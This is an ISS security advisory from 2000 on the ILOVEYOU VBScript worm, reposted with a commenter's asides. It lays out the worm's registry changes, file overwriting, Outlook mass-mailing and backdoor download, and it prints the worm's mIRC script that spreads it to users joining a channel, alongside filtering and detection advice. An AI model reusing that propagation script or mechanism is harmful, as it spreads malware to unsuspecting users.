Internet Security Systems Security Alert
May 4, 2000

"ILOVEYOU" Virus Affects Windows Users


A dangerous Visual Basic Script (VBScript) virus, dubbed the "LoveLetter" or
"ILOVEYOU" virus, has been spreading itself across the Internet through email
via Microsoft Outlook and through Internet Relay Chat (IRC) using a popular
IRC client named mIRC. The virus is susceptible to activation whenever the
Windows Script Host features are enabled.


Mail servers may incur mild to severe overloading and could crash when flooded
with an unexpected number of the ILOVEYOU messages. The actual VBScript code
performs a number of destructive tasks:
- - modifies and creates various Windows registry entries
- - launches Internet Explorer to download a backdoor program which, once
installed, captures network passwords and emails this data to an account in
the Philippines
- - infects the local machine by creating many new copies of itself and
overwriting data files of specific file types (including VBScript,
JavaScript, JPEG, and MP2/MP3)
- - spreads itself to other users by using information from the Microsoft
Outlook Address Book, as well as mIRC's DCC feature, which allows chat
participants to exchange files


Visual Basic Scripts can be executed if Windows Script Host (WSH) is installed
and enabled. Windows Script Host is installed by default with Windows 98 and
with Internet Explorer version 4.0 and later.

The message is very identifiable. The subject is always "ILOVEYOU", and the
body of the email only contains the message "kindly check the attached
LOVELETTER coming from me." The email contains a single instance of the virus
in the form of an attachment named "LOVE-LETTER-FOR-YOU.TXT.vbs".
(C0VERTl's note: this should have tipped anyone off with a half-brain, VBS is not a standard text or doc extension...)
When the attachment is opened, the malicious VBScript code launches,
performing the following operations in sequence:

- - The virus removes the timeout associated with the Windows scripting unit by
changing the value of the HKEY_CURRENT_USER\Software\Microsoft\Windows
Scripting Host\Settings\Timeout registry key.

- - The virus copies itself to SYSTEMDIR\MSKernel32.vbs, WINDIR\Win32DLL.vbs,

- - The following registry entries are created under HKEY_LOCAL_MACHINE, such
that the MSKernel32.vbs and Win32DLL.vbs copies will be launched at


Win32DLL.vbs is created as a service.

- - An HTML file named LOVE-LETTER-FOR-YOU.HTM is created for later use (in the
mIRC script) and placed in the Windows SYSTEMDIR. Typically, WINDIR is

- - The virus attempts to spread itself via e-mail using Microsoft Outlook. It
sends a message to all addresses found in every address book. Each
individual is flagged in the registry after they have been sent a copy.

For each address list that is found, a counter is kept in the registry to
track the number of users that have been mailed. The number of email addresses
in the address list is also recorded. If the number of addresses in the list
increases, the virus will enumerate the individuals again and send out the
"ILOVEYOU" mail to those who have not previously received it.

All flags are kept in HKEY_CURRENT_USER\Software\Microsoft\WAB.

- - The virus uses Internet Explorer to connect one of four HTTP web locations
in an attempt to download a backdoor program called WIN-BUGSFIX.EXE. This
backdoor program captures any network passwords it identifies and
automatically emails this information to a mail account in the Philippines,
presumably controlled by the author of the virus.

Before Internet Explorer is launched, the following registry entry, which sets
the Internet Explorer start page, is changed to one of four URLs at random:

\Software\Microsoft\Internet Explorer\Main\Start Page

After the executable is downloaded, the start page value is set to

- - The following registry entry is created (under HKEY_LOCAL_MACHINE) to launch
WIN-BUGSFIX.EXE at boot-time:


- - The virus identifies any "Fixed" or "Removable" drives connected to the
system and recursively visits each folder, overwriting files of any of the
following extensions with a copy of itself, changing the extension to ".vbs"
and deleting the original file:

vbs - Visual Basic Script
vbe - Visual Basic Script (Encoded)
js - JavaScript
jse - JavaScript (Encoded)
css - Cascading Style Sheets
wsh - Windows Script Host
sct - Scriptlet file
hta - HTML Application

The virus deletes any .jpg and .jpeg compressed image files, and replaces by a
copy of the virus with ".vbs" appended to the end of the original file name.

Original copies of any MP3 or MP2 audio files found are preserved, but a copy
of the virus is created using the same file name with ".vbs" appended. The
original MP2/MP3 file's attributes will be changed so the file is hidden.

- - If any of the files "mirc32.exe", "mlink32.exe", "mirc.ini", "script.ini",
or "mirc.hlp" are found, a new default initialization script named
"script.ini" is created in the same directory:

;mIRC Script
; Please dont edit this script... mIRC will corrupt, if mIRC will
; corrupt... WINDOWS will affect and will not run correctly. thanks
;Khaled Mardam-Bey
n0=on 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick &dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"

This script will attempt to send a copy of the pre-generated HTML page to any
user who is seen joining any channel you are in on IRC.


Everyone should obtain and install the latest virus definition files for their
virus scanning software. Mail administrators should filter out any email that
has a .VBS attachment, or at least any mail with a subject line of

ISS RealSecure can be configured to detect the ILOVEYOU virus by creating a
new User Defined Event. Set the priority to HIGH, and the context to
Email_Content. Set the search string to "kindly check the attached LOVELETTER
coming from me". Select the actions to RSKILL, and any additional action you
would like. This should stop any incoming email containing the virus from
being delivered to an SMTP server.

(C0VERTl's Note: The old simple solution could save your ass, NEVER open attached files from strangers. And be suspicious of attached files from friends that you did not request. Always check the file extension as well. Its amazing so many 'experts' fell for this so called virus.)
Trend Micro's instructions for removing the virus from your system can be
found at

Additional Information:

For more information on the ILOVEYOU virus, visit the following web sites:


About Internet Security Systems (ISS)

Internet Security Systems (ISS) is a leading global provider of security
management solutions for the Internet. By providing industry-leading SAFEsuite
security software, remote managed security services, and strategic consulting
and education offerings, ISS is a trusted security provider to its customers,
protecting digital assets and ensuring safe and uninterrupted e-business. ISS'
security management solutions protect more than 5,500 customers worldwide
including 21 of the 25 largest U.S. commercial banks, 10 of the largest
telecommunications companies and over 35 government agencies. Founded in 1994,
ISS is headquartered in Atlanta, GA, with additional offices throughout North
America and international operations in Asia, Australia, Europe, Latin America
and the Middle East. For more information, visit the Internet Security Systems
web site at or call 888-901-7477.

Copyright (c) 2000 by Internet Security Systems, Inc.